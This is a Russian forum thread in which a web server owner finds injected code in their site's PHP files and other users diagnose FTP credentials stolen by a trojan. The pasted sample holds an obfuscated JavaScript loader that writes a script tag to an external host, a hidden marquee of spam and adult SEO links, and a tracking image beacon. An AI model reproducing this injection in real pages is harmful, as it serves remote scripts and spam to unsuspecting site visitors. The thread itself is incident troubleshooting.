LINUX.ORG.RU

Переписываются HTML-скрипты!


0

0

Есть веб-сервер на httpd-2.0.54.
Есть несколько файлов php, из которых собирается начальная страница сайта.
Заметил, что они стали переписываться.
Втавляется кусок(см. ниже).
Если раскодировать строку a a-ции Decode(), то получается такая строка:
<script src="http://trustedtop10.com/se.js"></script>;

Судя по логам, никто не регистрировался в системе.
Что же это за ерунда такая? Вирус и что другое?
-------------------------------------------

<body><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!104!116!116!112!58!47!47!116 !114!117!115!116!101!100!116!111!112!49!48!46!99!111!109!47!115!101!46!106!115!3 4!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while (str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(te mp);temp="";}document.write(out);}
//-->
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT><marquee behavior=scroll direction=up height=20 scrollamount=1 loop=-1 scrolldelay=12000 onmouseover='this.stop()' onmouseout='this.start()'><a href=http://hindibook.com/tmp/alex-clips.html>alex clips</a>
<a href=http://hindibook.com/tmp/allied-tube-and-conduit.html>allied tube and conduit</a>
<a href=http://hindibook.com/tmp/alyssa-milano-nude-videos.html>alyssa milano nude videos</a>
<a href=http://hindibook.com/tmp/amatuer-adult-videos.html>amatuer adult videos</a>

-------------------------------------------
...тут всякие подобные ссылки
-------------------------------------------

<a href=http://hindibook.com/tmp/brazil-copper-tube.html>brazil copper tube</a>
<a href=http://hindibook.com/tmp/bree-olson-videos.html>bree olson videos</a>
<a href=http://hindibook.com/tmp/britney-spears-at-vma-video.html>britney spears at vma video</a>
</marquee></body>
</html><img src="http://solarstation.ru/images/knock.php?id=FTsoCUuYgeqvkiY">;

-------------------------------------------

anonymous

однозначно вирь. Варианта два:

1. Заражен компьютер кого-то из разработчиков, на котором настроен фтп с записанным пароле (например в Far-е)

2. На самом сервере какой-нибудь скрипт ходит по папкам хостящихся и дописывает эту хрень...

sidor ★★
()
Ответ на: комментарий от sidor

1. Я единственный такой разработчик. И пароль на фтп как раз в фаре записан. Но время изменения файлов такое, когда мой комп уже выключен был.
2. А как можно по-быстрому проверить на вирусы сервер? Или проще переустановить систему? Это сервер организации, так что не так страшен простой.

anonymous
()
Ответ на: комментарий от anonymous

Было такое, троян увел у тебя пароль на ФТП, и по ФТП теперь дописывается эта хрень к файлам. Смотри логи на ФТП сервере, и смени пароль на ФТП.

Steel901
()
Ответ на: комментарий от Steel901

Точно!
В логах фтп нашел записи.
Спасибо!

anonymous
()
Ответ на: комментарий от anonymous

>Это сервер организации, так что не так страшен простой.

БУГАГА !!!

xtron
()
Ответ на: комментарий от anonymous

Вирус на компьютере сам не переписывает файлы, он только передает их в некое хранилище ботнета. Другой бот уже выдирает из этого хранилища фтп пароли и переписывает сайты пачками.. так что если вылечишь комп - помни, твой пароль уже где-то в китае сохранен.

OxiD ★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.